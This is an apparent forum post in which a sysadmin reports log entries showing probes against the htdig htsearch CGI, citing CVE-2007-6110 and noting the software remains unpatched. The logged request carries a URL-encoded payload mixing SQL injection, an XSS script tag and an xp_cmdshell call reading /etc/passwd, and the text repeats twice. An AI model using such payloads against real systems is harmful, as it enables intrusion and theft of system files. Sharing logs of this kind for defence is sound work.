htdig-3.2.0b6 XSS
by jayjwa from LinuxQuestions.org on (#6PEJ4)
Lately I've been seeing this stuff in the logs:
Code:179.60.150.123 - - [23/Jul/2024:10:40:54 -0400] "GET /cgi-bin/htsearch?config=htdig&restrict=1&exclude=1&words=1&zeuP%3D5620%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 1768 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0"
179.60.150.123 - - [23/Jul/2024:10:40:56 -0400] "GET /cgi-bin/htsearch?config=htdig&restrict=1&exclude=1&words=1 HTTP/1.1" 200 1768 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0"
179.60.150.123 - - [23/Jul/2024:10:40:56 -0400] "GET /cgi-bin/htsearch?config=3644&restrict=1&exclude=1&words=1 HTTP/1.1" 200 373 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0"
179.60.150.123 - - [23/Jul/2024:10:40:57 -0400] "GET /cgi-bin/htsearch?config=4631&restrict=1&exclude=1&words=1 HTTP/1.1" 200 373 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0"https://cve.mitre.org/cgi-bin/cvenam...=CVE-2007-6110
https://www.exploit-db.com/exploits/30818
Tested vulnerable, htdig-3.2.0b6, on Apache httpd-2.4.62, Current. The project looks dead, with the last release 20 years ago. Some of the other distros might have a patch for it but I can't seem to find one right now.
Code:179.60.150.123 - - [23/Jul/2024:10:40:54 -0400] "GET /cgi-bin/htsearch?config=htdig&restrict=1&exclude=1&words=1&zeuP%3D5620%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 1768 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0"
179.60.150.123 - - [23/Jul/2024:10:40:56 -0400] "GET /cgi-bin/htsearch?config=htdig&restrict=1&exclude=1&words=1 HTTP/1.1" 200 1768 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0"
179.60.150.123 - - [23/Jul/2024:10:40:56 -0400] "GET /cgi-bin/htsearch?config=3644&restrict=1&exclude=1&words=1 HTTP/1.1" 200 373 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0"
179.60.150.123 - - [23/Jul/2024:10:40:57 -0400] "GET /cgi-bin/htsearch?config=4631&restrict=1&exclude=1&words=1 HTTP/1.1" 200 373 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0"https://cve.mitre.org/cgi-bin/cvenam...=CVE-2007-6110
https://www.exploit-db.com/exploits/30818
Tested vulnerable, htdig-3.2.0b6, on Apache httpd-2.4.62, Current. The project looks dead, with the last release 20 years ago. Some of the other distros might have a patch for it but I can't seem to find one right now.